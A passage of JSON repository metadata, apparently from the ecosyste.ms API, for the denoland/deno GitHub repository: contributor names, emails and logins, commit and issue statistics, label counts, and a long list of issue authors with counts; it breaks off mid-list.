ac","count":1},{"name":"iownbey","email":"54186227+iownbey","login":"iownbey","count":1},{"name":"intelliking","email":"tyleradams93226@gmail.com","login":"intelliking","count":1},{"name":"goingforstudying-ctrl","email":"goingforstudying@gmail.com","login":"goingforstudying-ctrl","count":1},{"name":"geogrego","email":"geogrego@outlook.com","login":"geogrego","count":1},{"name":"ddmoney420","email":"130018552+ddmoney420","login":"ddmoney420","count":1},{"name":"cui fliter","email":"imcusg@gmail.com","login":"cuishuang","count":1},{"name":"Lee Dogeon","email":"dev.moreal@gmail.com","login":"moreal","count":1},{"name":"Langning Zhang","email":"zln1905391059@163.com","login":"Boulea7","count":1},{"name":"Kyle Tse","email":"shtse8@gmail.com","login":"shtse8","count":1},{"name":"Kyle Kelley","email":"rgbkrk@gmail.com","login":"rgbkrk","count":1},{"name":"Krhougs","email":"gh@kt.je","login":"krhougs","count":1},{"name":"Kit Dallege","email":"xaum.io@gmail.com","login":"kovan","count":1},{"name":"Kisaragi Hiu","email":"mail@kisaragi-hiu.com","login":"kisaragi-hiu","count":1},{"name":"Kingsword","email":"kingsword09@gmail.com","login":"kingsword09","count":1},{"name":"Kazuki Ota","email":"ota_droid@live.jp","login":"dojyorin","count":1},{"name":"KT","email":"44502608+ktKongTong","login":"ktKongTong","count":1},{"name":"Josh Fleming","email":"jf@joshfleming.com","login":"joshvfleming","count":1},{"name":"Jose Fernandez","email":"me@jrfernandez.com","login":"jfernandez","count":1},{"name":"John Vandenberg","email":"jayvdb@gmail.com","login":"jayvdb","count":1},{"name":"John L. Carveth","email":"jlcarveth@gmail.com","login":"JLCarveth","count":1},{"name":"John Downey","email":"jdowney@gmail.com","login":"jtdowney","count":1},{"name":"Jeff Wilson","email":"jeff@jeffalwilson.com","login":"jawilson","count":1},{"name":"Jean Ibarz","email":"ibarz.jean@gmail.com","login":"jeanibarz","count":1},{"name":"Jasper","email":"jasper@jasperhugo.com","login":"jbg","count":1},{"name":"Janosh Riebesell","email":"janosh.riebesell@gmail.com","login":"janosh","count":1},{"name":"James McNally","email":"james@wiresmithtech.com","login":"JamesMc86","count":1},{"name":"James Bronder","email":"36022278+jbronder","login":"jbronder","count":1},{"name":"Ishita SIngh","email":"ish1442006@gmail.com","login":"ish1416","count":1},{"name":"Igor Borisoglebski","email":"161773052+igorbdl","login":"igorbdl","count":1},{"name":"Hunnyboy1217","email":"110440428+hunnyboy1217","login":"hunnyboy1217","count":1},{"name":"Adriano","email":"29012873+isAdrisal","login":"isAdrisal","count":1},{"name":"cui","email":"cuiweixie@gmail.com","login":"cuiweixie","count":1},{"name":"Rizky Mirzaviandy Priambodo","email":"142987522+Xavrir","login":"Xavrir","count":1},{"name":"Reububble","email":"reububble@gmail.com","login":"Reububble","count":1},{"name":"Ramnivas Laddad","email":"ramnivas@exograph.dev","login":"ramnivas","count":1},{"name":"Pádraic Slattery","email":"pgoslatara@gmail.com","login":"pgoslatara","count":1},{"name":"Pluto","email":"128720033+it-education-md","login":"it-education-md","count":1},{"name":"Paul Browne","email":"Paulmatthewbrowne@gmail.com","login":"Paul-Browne","count":1},{"name":"Olivér Falvai","email":"ofalvai@gmail.com","login":"ofalvai","count":1},{"name":"Oliver Kuckertz","email":"oliver@kuckertz.cloud","login":"mologie","count":1},{"name":"Ohkubo KOHEI","email":"kuboon@trick-with.net","login":"kuboon","count":1},{"name":"Nassim Z","email":"hironichu@pm.me","login":"hironichu","count":1},{"name":"Nandhis","email":"45960035+msnandhis","login":"msnandhis","count":1},{"name":"Murat Kirazkaya","email":"77299279+GroophyLifefor","login":"GroophyLifefor","count":1},{"name":"MkDev11","email":"94194147+MkDev11","login":"MkDev11","count":1},{"name":"Minh Vu","email":"vuhoangminh97@gmail.com","login":"fallintoplace","count":1},{"name":"Michal Piechowiak","email":"misiek.piechowiak@gmail.com","login":"pieh","count":1},{"name":"Michael Horstmann","email":"mhorstmann@posteo.de","login":"mhrstmnn","count":1},{"name":"Meet Dhanani","email":"124246235+meetdhanani17","login":"meetdhanani17","count":1},{"name":"Maxwell Calkin","email":"101308415+MaxwellCalkin","login":"MaxwellCalkin","count":1},{"name":"Mattias Runge-Broberg","email":"mattias@runge.se","login":"mattiasrunge","count":1},{"name":"Manichandra","email":"mcnc33@gmail.com","login":"manichandra","count":1},{"name":"Ly Nguyen","email":"contact@minhlynguyenvo.com","login":"mlyngvo","count":1},{"name":"Lucas Wang","email":"cp7777.tw@hotmail.com","login":"gn00295120","count":1},{"name":"Luca Barbato","email":"luca.barbato@gmail.com","login":"lu-zero","count":1},{"name":"Leo Zaki","email":"16448590+7Hazard","login":"7Hazard","count":1}],"commits_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/commits","host":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2026-09-08T00:00:08.681Z","repositories_count":7156153,"commits_count":1060187636,"contributors_count":46476520,"owners_count":1429438,"committers_count":3470056,"icon_url":"https://github.com/github.png","host_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories"}},"issues":{"table":{"full_name":"denoland/deno","html_url":"https://github.com/denoland/deno","last_synced_at":"2026-09-08T15:20:51.828Z","status":null,"issues_count":6662,"pull_requests_count":9678,"avg_time_to_close_issue":17121605.73139413,"avg_time_to_close_pull_request":1530875.9301115242,"issues_closed_count":3814,"pull_requests_closed_count":8069,"pull_request_authors_count":594,"issue_authors_count":2496,"avg_comments_per_issue":2.5022515761032724,"avg_comments_per_pull_request":0.7209134118619549,"merged_pull_requests_count":7045,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":682,"past_year_pull_requests_count":1198,"past_year_avg_time_to_close_issue":1327952.9787234042,"past_year_avg_time_to_close_pull_request":1317968.8908554572,"past_year_issues_closed_count":235,"past_year_pull_requests_closed_count":678,"past_year_pull_request_authors_count":194,"past_year_issue_authors_count":379,"past_year_avg_comments_per_issue":1.2272727272727273,"past_year_avg_comments_per_pull_request":1.1327212020033388,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":509,"created_at":"2023-05-10T11:28:12.211Z","updated_at":"2026-09-08T15:20:51.828Z","repository_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","issue_labels_count":{"table":{"bug":1587,"node compat":808,"suggestion":419,"lsp":261,"cli":234,"feat":212,"needs info":138,"needs investigation":136,"node API polyfill":122,"testing":102,"perf":98,"deno fmt":97,"compile":94,"question":94,"web":93,"upstream":90,"install":82,"good first issue":81,"flaky":62,"windows":56,"invalid":56,"desktop":49,"panic":47,"duplicate":46,"public API":45,"chore":45,"ext/http":44,"ext/kv":44,"permissions":43,"task runner":42,"node native extension":42,"crypto":40,"refactor":39,"tsc":38,"otel":38,"working as designed":37,"runtime":36,"enhancement":36,"build":35,"repl":34,"tests":33,"swc":33,"node resolution":32,"publish":31,"jupyter":29,"node API":29,"deno_core":28,"workspaces":27,"lint":27,"ext/fetch":27,"node:http":26,"ext/web":25,"help wanted":25,"docs":24,"tls":23,"needs discussion":22,"important for fresh":22,"--watch":21,"ext/websocket":21,"high priority":21,"types":20,"stale":19,"jsr":17,"webgpu":17,"deno jupyter":16,"vendor":15,"2.0 triage required":15,"triage required 👀":14,"declined":14,"debugger":13,"breaking change":13,"ext/console":13,"tsgo":12,"fix available":12,"node:sqlite":12,"serve":12,"fmt":12,"core":11,"config":10,"needs triage":10,"ext/crypto":9,"ext/fs":9,"FFI":9,"ext/ffi":9,"inspector":9,"ext/webgpu":9,"design limitation":8,"dx":8,"outdated":8,"embedder":8,"nextjs":7,"resolution":7,"node-api":6,"maybe 2.0":6,"ext/net":6,"proposal":6,"benchmarks":6,"patch":6,"custom runtime":6,"ext/url":5,"regression":5,"v8":5,"auto-install":5,"user feedback wanted":5,"ext/cron":4,"macos":4,"streams":4,"temporal":4,"std":4,"snapshots":4,"usability":4,"deno-bundle":3,"peerDependencies":3,"bundler-resolution":3,"node:vm":3,"2.0 feedback":3,"wasm":2,"gitstart":2,"linux":2,"ext/timers":2,"deno info":2,"native V8 addon":1,"unactionable":1,"node:v8":1,"jsx-precompile":1,"docker":1,"quic":1,"ci-bench":1,"devdependencies":1,"ENHANCEMENT":1,"deploy":1}},"pull_request_labels_count":{"table":{"ci-draft":94,"ci-bench":86,"dependencies":27,"ci-full":16,"rust":11,"node compat":10,"backport:1.46":10,"bug":9,"patch":8,"nextgen":4,"perf":3,"node API polyfill":3,"compile":3,"upstream":3,"stale":2,"lsp":2,"pr:2.0":2,"node:vm":2,"question":1,"[deprecated] team/networks":1,"testing":1,"dependencies-go":1,"🔠implementation":1,"changelog/no-changelog":1,"release":1,"install":1,"node:http":1,"suggestion":1,"🔼enhancement":1,"deno fmt":1,"ci-test-flaky":1}},"issue_author_associations_count":{"table":{"NONE":3943,"CONTRIBUTOR":1612,"MEMBER":1053,"COLLABORATOR":53}},"pull_request_author_associations_count":{"table":{"MEMBER":6047,"CONTRIBUTOR":2171,"COLLABORATOR":897,"NONE":559,"OWNER":4}},"issue_authors":{"table":{"dsherret":296,"bartlomieju":237,"marvinhagemeister":219,"lucacasonato":127,"littledivy":114,"sigmaSd":112,"iuioiua":82,"kitsonk":76,"ry":71,"kt3k":70,"scarf005":61,"birkskyum":52,"steve02081504":51,"nathanwhit":46,"oscarotero":46,"lowlighter":39,"nicolo-ribaudo":36,"kevgeoleo":36,"jespertheend":35,"mmastrac":32,"felipecrs":30,"dandv":30,"lionel-rowe":29,"nayeemrmn":29,"alexgleason":29,"satyarohith":28,"BlackAsLight":28,"sant123":25,"petamoriken":22,"KnorpelSenf":22,"davidebombelli":22,"loynoir":22,"mfulton26":22,"josephrocca":21,"Reububble":21,"magurotuna":19,"NfNitLoop":19,"kuchta":19,"andykais":19,"nestarz":19,"rgbkrk":18,"guy-borderless":17,"vdata1":16,"crowlbot":16,"johndeighan":15,"jsejcksn":15,"rivy":15,"irbull":15,"ryuapp":15,"KyleJune":14,"tmcw":14,"csvn":14,"nshiab":14,"nberlette":14,"crowlKats":14,"uriva":14,"caspervonb":14,"piscisaureus":13,"sergeysolovev":13,"0f-0b":13,"alita-moore":12,"johnspurlock":12,"JOTSR":12,"panva":12,"skybrian":11,"huseeiin":11,"quadratz":11,"sylc":11,"lishaduck":11,"matthew-wong1":11,"stefnotch":11,"DetachHead":11,"dmint789":11,"lrowe":11,"Hexagon":10,"Blatman":10,"andreubotella":10,"jerome-benoit":10,"jeiea":10,"linbingquan":10,"albnnc":10,"cknight":10,"brc-dd":10,"chirsz-ever":10,"kakashi-69-xd":10,"cowboyd":9,"gmzacharydovel":9,"ooker777":9,"ArmaanAS":9,"CyanChanges":9,"terrablue":9,"teidesu":9,"Macil":9,"lucsoft":9,"maxmcd":9,"Jeffery6329":9,"annevk":9,"roj1512":9,"jimmywarting":9,"yasaichi":9,"notroid5":8,"mash-graz":8,"Mqxx":8,"igorzi":8,"kawmra":8,"begoon":8,"Hajime-san":8,"lambdalisue":8,"jtoppine":8,"bjesuiter":8,"sgwilym":8,"not-my-profile":7,"oscar6echo":7,"LitoMore":7,"digitalnature":7,"teleclimber":7,"bombillazo":7,"tenkoverse":7,"rbetts":7,"aricart":7,"mcgear":7,"redabacha":7,"bcheidemann":6,"mxschmitt":6,"fushihara":6,"GJZwiers":6,"quentinadam":6,"iugo":6,"secext2022":6,"ghost":6,"rajinder-yadav":6,"cspotcode":6,"happyhunter7":6,"rnbguy":6,"0x009922":6,"rracariu":6,"c-antin":6,"acrodrig":6,"harrysolovay":6,"jcbhmr":6,"dojyorin":6,"familyboat":6,"kensukesaito":6,"vicary":6,"nleck":6,"Tango992":6,"pagoru":5,"dahlia":5,"Malix-Labs":5,"rotu":5,"M4RC3L05":5,"FND":5,"eavidy":5,"arnauorriols":5,"cyco130":5,"rojvv":5,"Sembiance":5,"jabed-web-dev":5,"silverbucket":5,"Octo8080X":5,"vrugtehagel":5,"lucab":5,"leighmcculloch":5,"jollytoad":5,"x80486":5,"mhanuszh":5,"rroblf01":5,"xuybin":5,"EdJoPaTo":5,"imcotton":5,"nktpro":5,"twenty-tools":5,"garethj2":5,"BlowaterNostr":5,"sgvictorino":5,"szmarczak":5,"ayame113":5,"renardeinside":5,"cotyhamilton":5,"ebebbington":5,"h76oeI6pMxU9g4p8aCpc6Q":5,"niedzielski":5,"jcayzac":5,"franz101":5,"lukeed":5,"danopia":5,"starkpsmichael":4,"king8fisher":4,"jaydenseric":4,"EtienneBruines":4,"cscheid":4,"lilnasy":4,"raaymax":4,"brunnerh":4,"MarkTiedemann":4,"DonJayamanne":4,"Skalman":4,"NarHakobyan":4,"sidesteps":4,"uncomfyhalomacro":4,"knotbin":4,"johnspurlock-skymethod":4,"masx200":4,"adamgreg":4,"thisisjofrank":4,"saeho":4,"Ciantic":4,"Jamesernator":4,"ansemb":4,"JonathonRP":4,"narumincho":4,"mizchi":4,"solb":4,"lts20050703":4,"maliknajjar":4,"Corei13":4,"mintydev789":4,"danilkinkin":4,"janosh":4,"drag0n-app":4,"StarLederer":4,"yuhr":4,"Asguho":4,"skeithtan":4,"e3dio":4,"mfrancis107":4,"jpravetz":4,"theaddonn":4,"shinebayar-g":4,"studiowebux":4,"tugrulates":4,"izelnakri":4,"svenemtell":4,"redradist":4,"ben-laird":4,"eikooc":4,"ufr-scf":4,"tjconcept":4,"sinclairzx81":4,"johnstonmatt":4,"soundstep":4,"demostanis":4,"ayoreis":4,"Soremwar":4,"sigmaxipi":4,"esroyo":4,"DjDeveloperr":4,"swcarter007":4,"MonstraG":4,"benStre":4,"Yohe-Am":4,"disjukr":4,"jeffreyschultz":4,"tredondo":4,"pihentagy":4,"lino-levan":4,"Seally":3,"devingfx":3,"malthe":3,"tainn":3,"DMeechan":3,"AFKBETO":3,"ondras":3,"firecakes":3,"BerndAmend":3,"mimbrown":3,"Hixie":3,"KlaasSkelteAtEnatom":3,"mahtaran":3,"felix-schindler":3,"eloyleonardo":3,"jiawei397":3,"leonbakadorov":3,"kwhinnery":3,"timharek":3,"guybedford":3,"Diluka":3,"jlucaso1":3,"muddlebee":3,"mlandalv":3,"NeKzor":3,"bajtos":3,"josh-collinsworth":3,"Giesch":3,"bkerin":3,"brillout":3,"andrewbrey":3,"pomdtr":3,"ZYinMD":3,"milaz":3,"mishushakov":3,"abhi-parate-st3":3,"justinmchase":3,"eliassjogreen":3,"librejutsu":3,"ealib":3,"akku1139":3,"chances":3,"kidonng":3,"caleblloyd":3,"tomas-zijdemans":3,"babakfp":3,"muthu90tech":3,"andreespirela":3,"a4arpon":3,"ericfrederich":3,"Decodetalkers":3,"iherman":3,"vladjerca":3,"lenovouser":3,"dong-lufei":3,"phaux":3,"JetLua":3,"MattiasBuelens":3,"bavoco":3,"mcandeia":3,"andreas-wagner":3,"mpcref":3,"jakubdonovan":3,"dionjwa":3,"Gambloide":3,"hexbinoct":3,"lethib":3,"Mutefish0":3,"imjamesb":3,"Skillz4Killz":3,"behnam-oneschema":3,"galiazzi":3,"sachaw":3,"saschanaz":3,"JakeOShannessy":3,"timreichen":3,"beshubh":3,"samuelcolvin":3,"juchiast":3,"Stokestack":3,"exe-dealer":3,"wangfeng1994":3,"hazae41":3,"abhayraj-yadav-st4":3,"andyleiserson":3,"leonco":3,"yoavweiss":3,"trustytrojan":3,"domenic":3,"fcrozatier":3,"MirKml":3,"Jobians":3,"trymeouteh":3,"florian-imi":3,"thesmart":3,"frou":3,"janpio":3,"77it":3,"JasperVanEsveld":3,"bitsnaps":3,"beingminimal":3,"gustav-dahl":3,"jlarmstrongiv":3,"python-pk":3,"mdekstrand":3,"tghpereira":3,"matklad":3,"xpr0gamers":3,"Skeletor11":3,"mb21":3,"krlwlfrt":3,"marcomow":3,"hansSchall":3,"ramnivas":3,"MasterKale":3,"harvestcore":3,"mayank99":3,"avalero":3,"Blocksnmore":3,"jeff-hykin":3,"MiguelRipoll23":3,"skoshx":3,"thomas3577":3,"zachauten":3,"joewalker":3,"codepage949":3,"5d-jh":3,"ngdangtu-vn":3,"xBZZZZ":3,"codehz":3,"4513ECHO":3,"MierenManz":3,"maclong9":3,"uki00a":3,"andrewthauer":3,"shevernitskiy":3,"Im-Beast":3,"lbguilherme":2,"commongeek":2,"smartmeta":2,"diachedelic":2,"Dmitri-Sintsov":2,"babiabeo":2,"ritsaert":2,"rycont":2,"Amatewasu":2,"louislam":2,"askonomm":2,"db213":2,"eranknafo2001":2,"dogukanakkaya":2,"VlkrS":2,"cmoog":2,"DevRubicate":2,"jessiejs":2,"will-weiss":2,"landsman":2,"predystopic-dev":2,"svscorp":2,"CertainLach":2,"canonic-epicure":2,"elycheikhsmail":2,"littletof":2,"RickeyWard":2,"AugustinMauroy":2,"hotrush":2,"btwiuse":2,"DSergiu":2,"Booteille":2,"merouaneamqor":2,"rupurt":2,"Danielduel":2,"hashrock":2,"andrejcremoznik":2,"benjamingr":2,"mochalins":2,"rscarson":2,"pwypustek":2,"jcpsimmons":2,"ThatBlockyPenguin":2,"nth10sd":2,"MrCarbone":2,"wangzishi":2,"qupig":2,"anggoran":2,"pedropaulosuzuki":2,"sammyne":2,"asg017":2,"daweijs":2,"Dialga":2,"zhang-wenchao":2,"JimBuzbee":2,"rhzone":2,"honnip":2,"neongreen":2,"jflatow":2,"andreasteich":2,"igorbrasileiro":2,"RickCogley":2,"zefhemel":2,"jbsiddall":2,"Kyiro":2,"hapaxlife":2,"mindon":2,"hermy991":2,"JumpLink":2,"osddeitf":2,"sakgoyal":2,"sepehrst":2,"uncenter":2,"jsafarik":2,"williamhorning":2,"rogerta":2,"fakoua":2,"AddictArts":2,"bowtiedgnome":2,"patrickalima98":2,"cd-work":2,"juanfra684":2,"swwind":2,"mikedov":2,"securesvet":2,"anywhichway":2,"jowens":2,"annervisser":2,"sspilleman":2,"jkscx":2,"proctord-flal":2,"EKliptus":2,"printfn":2,"YuniqueUnic":2,"perguto":2,"DerZade":2,"r-ae-i":2,"udp53":2,"lexuzieel":2,"aliak00":2,"KunkaiLin1205":2,"HuakunShen":2,"hanguokai":2,"Enva2712":2,"nickchomey":2,"jamesdiacono":2,"Zizaco":2,"MILLERMARRU":2,"JetSetVideo":2,"grian32":2,"jonasb":2,"uchuhimo":2,"NetOpWibby":2,"dbushell":2,"mitranim":2,"KSXGitHub":2,"janispritzkau":2,"vfssantos":2,"levex":2,"LP1994":2,"Cassielxd":2,"avocet-bot":2,"Milly":2,"ericsink":2,"tdillon":2,"farsightsoftware":2,"taoeffect":2,"wildtang":2,"peter-jerry-ye":2,"nemosmithasf":2,"zph":2,"Renotje6":2,"xXACCEXx":2,"taras":2,"takker99":2,"mechanoid":2,"suchy":2,"NathanFlurry":2,"inverted-capital":2,"tbontb-iaq":2,"devalexqt":2,"hugoalh":2,"surfmuggle":2,"itsfuad":2,"etienne-dldc":2,"Lenni009":2,"isAdrisal":2,"suchislife801":2,"chrisdickinson":2,"chabanov":2,"zuisong":2,"niteshbalusu11":2,"viktormarinho":2,"gildas-lormeau":2,"thoriqadillah":2,"finleyjb":2,"kruncher":2,"ethic-233":2,"rickylabs":2,"FredslundMagnus":2,"zebreus":2,"ynwd":2,"Grunet":2,"mattjennings":2,"GitRowin":2,"BSN4":2,"mariusheil":2,"hack3ric":2,"andyjp":2,"kingkong404":2,"Martin-Ting":2,"stack72":2,"mo":2,"Luchooo":2,"Srabutdotcom":2,"aohanhongzhi":2,"duncanmak":2,"kigawas":2,"gewoonwoutje":2,"bershanskiy":2,"fy2ne":2,"kienhg96":2,"jeremyBanks":2,"philhawksworth":2,"rickyraz":2,"hayd":2,"stil":2,"Piroro-hs":2,"mlafeldt":2,"alarbada":2,"Jabolol":2,"keelii":2,"fro-profesional":2,"RihanArfan":2,"akatechis":2,"fuji44":2,"intpfx":2,"quick007":2,"hemanth":2,"aminehochlef":2,"ploiu":2,"gerabell":2,"mikroskeem":2,"johndevor":2,"Ettapp":2,"UrielCh":2,"oles":2,"diqye":2,"VestaCord":2,"nounder":2,"TB516":2,"mys1024":2,"Guerteltier":2,"legowerewolf":2,"haturatu":2,"denis-migdal":2,"cdaringe":2,"kingsword09":2,"cam-mcevenue":2,"johngeorgewright":2,"wojpawlik":2,"jduan00":2,"sirikon":2,"PatrickJS":2,"izznatsir":2,"mmayernick":2,"rawkakani":2,"lauer3912":2,"drewbitt":2,"aralroca":2,"talentlessguy":2,"zifeo":2,"itsdouges":2,"afifurrohman-id":2,"KevinMGranger":2,"Timmmm":2,"cwalton":2,"okikio":2,"catuhana":2,"zbynekwinkler":2,"Sleepful":2,"JLCarveth":2,"yazan-abdalrahman":2,"crowlsyong":2,"h4l":2,"igorbdl":2,"git001":2,"ayonli":2,"fry69":2,"njbraun":2,"billywhizz":2,"matthewadams":2,"espindola":2,"sasivarnan":2,"boyeln":2,"MikeyA-yo":2,"chibat":2,"goddtriffin":2,"chenrui333":2,"JaegerMa":2,"HeyITGuyFixIt":2,"slagiewka":2,"shaseley":2,"PutziSan":2,"Maxim-Mazurok":2,"tomas-zijdemans-vipps":2,"Boby900":2,"yzalium":2,"codekeyz":2,"AaronO":2,"tigitz":2,"MichaelHindley":2,"saint-james-fr":2,"samholmes":2,"timonson":2,"ycmjason":2,"hsjobeki":2,"benjamincburns":2,"m93a":2,"fwqaaq":2,"skycoop":2,"FuriouZz":2,"xbjfk":2,"bnoordhuis":2,"Exidex":2,"caramboleyo":2,"homersimpsons":2,"lambtron":2,"leongobbs":2,"curtisallen":2,"waugh":2,"zino23":2,"uga-rosa":2,"KaKi87":2,"SampaioLeal":2,"und-miller":2,"easrng":2,"alshdavid":2,"dan-j":2,"EdamAme-x":2,"rsp":2,"Cre3per":2,"skanehira":2,"RandomTimeLP":2,"ancoron":2,"TopchetoEU":2,"vseplet":2,"kewp":2,"chrisveness":2,"egfx-notifications":2,"aaronwlee":2,"sido378":2,"florianfrey1":2,"janie314":2,"y12studio":2,"yooneskh":2,"superior-framework":2,"kitsiosk":2,"Brixy":2,"Weldawadyathink":2,"halvardssm":2,"emilfihlman":2,"Smithx10":2,"Conaclos":2,"vanillabug":2,"corrideat":2,"mgenereu":2,"realChakrawarti":2,"AmionSky":2,"mrgrain":2,"ije":2,"windchime-yk":2,"singpolyma":2,"7flash":2,"heypiotr":2,"neuwirthe":2,"laurence-myers":2,"kevinkassimo":2,"ACGNnsj":2,"tolu":2,"lucadena":2,"jmoalves":2,"meepeek":2,"glebbash":2,"amundo":2,"attila-lin":2,"denizdogan":2,"samuelgozi":2,"lukas-santiago":2,"nanikit":2,"boutahlilsoufiane":1,"tianxiadys":1,"tinder-tannerbennett":1,"ndmekala":1,"slim-hmidi":1,"VelinGeorgiev":1,"qkniep":1,"jdiamond":1,"edilson258":1,"chasm":1,"RuinTD":1,"ryanhex53":1,"relrelb":1,"Pallob-Gain":1,"andreial":1,"pazaan":1,"JoshuaBrest":1,"toebeann":1,"ite-jankl":1,"vslinko":1,"sveisvei":1,"lukaso":1,"gorillapower":1,"gilvandovieira":1,"AStox":1,"gaggle":1,"rnza0u":1,"devsheva":1,"AmjadRabadi":1,"absorbb":1,"dgreensp":1,"earnestgoodwill":1,"mimiMonads":1,"ash30":1,"jkone27":1,"yotamN":1,"mk12":1,"thoughtpolice":1,"pting-me":1,"SRNV":1,"GirkovArpa":1,"localhosted":1,"xyzshantaram":1,"Silentdoer":1,"NReilingh":1,"Dewep":1,"cparmer":1,"potham":1,"lethanhan97":1,"apostolos-geyer":1,"Cufoon":1,"fosterushka":1,"abrgr":1,"zendive":1,"mohrobati":1,"julianbuettner":1,"envis10n":1,"AntonOfTheWoods":1,"a224327780":1,"alexanderharding":1,"alexanderGalushka":1,"ryanblock":1,"k-j0":1,"WilcoKruijer":1,"akshaybabloo":1,"hyeonLewis":1,"yishn":1,"MrEconomical":1,"brianleroux":1,"tkhatibi":1,"jaber-ghanem":1,"abhiparate14":1,"LoueeD":1,"jaller94":1,"maunzCache":1,"dimikot":1,"mkhl":1,"last-partizan":1,"Katze719":1,"KULTI1995":1,"dev-firstlvlpets":1,"sandersemmel":1,"rebu-dt":1,"buildcore":1,"rauno56":1,"rendaardy":1,"hwcwy":1,"ozanmuyes":1,"mpizenberg":1,"KarolBajkowski":1,"Yaikava":1,"cjnoname":1,"ip2location":1,"gillesmag":1,"pekam":1,"cacilhas":1,"SkepticMystic":1,"codesculpture":1,"AndreiTS":1,"danieleades":1,"MrBns":1,"barberdt":1,"RedChops":1,"pasha-bolokhov":1,"yazan-nidal":1,"MidAutumnMoon":1,"ryoppippi":1,"lukahartwig":1,"vadimpiven":1,"FDiskas":1,"ardasovvadim":1,"is-jonreeves":1,"sevehub":1,"anarchodin":1,"bolshoytoster":1,"james-Ballyhoo":1,"IWANABETHATGUY":1,"jonha892":1,"fbatiga":1,"openjr":1,"emilkallioniemi":1,"belyaev-dev":1,"SheetJSDev":1,"ntindle":1,"noamr":1,"jerry4718":1,"harunhasdal":1,"nirjan-dev":1,"desaisoftwaree":1,"wesley974":1,"swandir":1,"shoppingjaws":1,"std-move":1,"sibbng":1,"Jimdooz":1,"korkje":1,"orlov-vo":1,"eturino":1,"WhatzGames":1,"yabuki":1,"nirnay01":1,"jgoux":1,"mbodm":1,"ValorHeart":1,"Jiralite":1,"linhub15":1,"emi0x7d1":1,"ianbrault":1,"grempe":1,"den9yon9":1,"basictheprogram":1,"jacobhaap":1,"maxhoffmann":1,"danroddis-razor":1,"watzon":1,"Tzahile":1,"ejsmith":1,"irustm":1,"lucassusanto":1,"giovannibaldi":1,"rapan931":1,"szagi3891":1,"dylanpyle":1,"heavenshell":1,"acrois":1,"antichris":1,"pubmikeb":1,"rgrannell1":1,"MAG-AdrianMeredith":1,"Voklen":1,"matthewjnield":1,"glitch003":1,"cuishuang":1,"liamdebellada":1,"vinhjaxt":1,"danchitnis":1,"adamazad":1,"mdmusaibali":1,"cthlo":1,"tv2-kjetilwikestad":1,"gamertike":1,"gabeidx":1,"weezy20":1,"Crafter-Y":1,"Naokim-NHZ":1,"LePichu":1,"MLuc24":1,"emirom":1,"fonsp":1,"jackmawer":1,"ker0olos":1,"PengjuXu":1,"akawahuynh":1,"liesauer":1,"PAStheLoD":1,"serid":1,"EnixTV":1,"51ngul4r1ty":1,"felipefdl":1,"maximiliankolb":1,"Darren-Williams-Online":1,"AndreasNasman":1,"lenhosseini":1,"twosaturdayscode":1,"rmalizia44":1,"Gaubee":1,"Vetnametz":1,"samouri":1,"bai-jie":1,"zwn":1,"dasdeo":1,"cztomsik":1,"thautwarm":1,"xnuk":1,"voyage-impale-thaw":1,"sramam":1,"dancojocaru2000":1,"Silverdagger21":1,"danielr1996":1,"mmstick":1,"Rudxain":1,"MYDIH":1,"konuch":1,"qgates":1,"spkier12":1,"jdoleary":1,"kskarthik":1,"Leokuma":1,"Devansh-Baghel":1,"nagyatka":1,"polycatenane":1,"FergoTheGreat":1,"seanaye":1,"Aloso":1,"tv42":1,"load1n9":1,"mst2022":1,"motss":1,"Ravenstine":1,"braco":1,"feeddageek":1,"scotttrinh":1,"maikdevries":1,"ghosind":1,"empoalp":1,"jeremyroman":1,"piotrgrundas":1,"gothammm":1,"fserb":1,"Rummskartoffel":1,"bxff":1,"Mabi19":1,"berzi":1,"WhoCutTheCheese":1,"noClaps":1,"timschwab":1,"Ewok167":1,"tmikaeld":1,"MarybethGasman":1,"hamidpro":1,"yi-huan":1,"olaven":1,"k-right":1,"zZHorizonZz":1,"edtingen":1,"bjwktcsnzh":1,"russiankidgohax":1,"SoftwareAndOutsourcing":1,"rgripper":1,"jonaslindstr":1,"kecrily":1,"fillwithjoy1":1,"Asami-1":1,"SisyphusZheng":1,"fangyuan-neko":1,"shishkin":1,"simonbuchan":1,"onion108":1,"unoudos":1,"michaelpayne02":1,"ledlamp":1,"yarlajs":1,"TateKennington":1,"yacinehmito":1,"ClassicOldSong":1,"AdiHarif":1,"LeonnardoVerol":1,"fkoemep":1,"welsonjr":1,"usrtax":1,"dobbs":1,"microtactical":1,"tannal":1,"chefnaphtha":1,"livein":1,"sortofsleepy":1,"nesk":1,"valtlai":1,"xseman":1,"StilauGamer":1,"mato-a":1,"renhiyama":1,"MarkBennett":1,"ImSingee":1,"vixalien":1,"raine-works":1,"chrisbobek":1,"TheCymaera":1,"zzador":1,"timfish":1,"kitaharata":1,"chaorace":1,"nounderline":1,"flyboss":1,"shuimugan":1,"petr-rozum-ai":1,"davidgilbertson":1,"Lorenzo0111":1,"brycedorn":1,"jerhage":1,"Pamel-a":1,"PoignardAzur":1,"litttley":1,"mefistofelix":1,"hh54188":1,"TMarciDev":1,"ohardy":1,"iensu":1,"orvitpng":1,"srcarvalho12":1,"dgaubert":1,"nsetyo":1,"nesterow":1,"pacoita":1,"mattvr":1,"Peybro":1,"akhilman":1,"metalpipemomo":1,"jerrygreen":1,"jtibble":1,"hesam-init":1,"ss153g":1,"redbar0n":1,"ManuelFeller":1,"SerjoA":1,"zundaren":1,"smoofra":1,"Xeononyum":1,"magnusviri":1,"vighnesh153":1,"spalberg":1,"the-habib":1,"mitchtreece":1,"pakastin":1,"valpackett":1,"chrisabrams":1,"joeftiger":1,"al6x":1,"paperclover":1,"alyti":1,"Kotlin-GDE":1,"ZombieB1309":1,"jscc":1,"KrisReal":1,"adamzerner":1,"deep-c":1,"a18-n03":1,"thebenperson":1,"conartist6":1,"Thyra":1,"luminr":1,"jupegarnica":1,"oon00b":1,"DanteASC4":1,"gentlementlegen":1,"ChasLui":1,"RoXuS":1,"aescling":1,"hirohitokato":1,"yinheli":1,"mrgebra1":1,"HerrTurin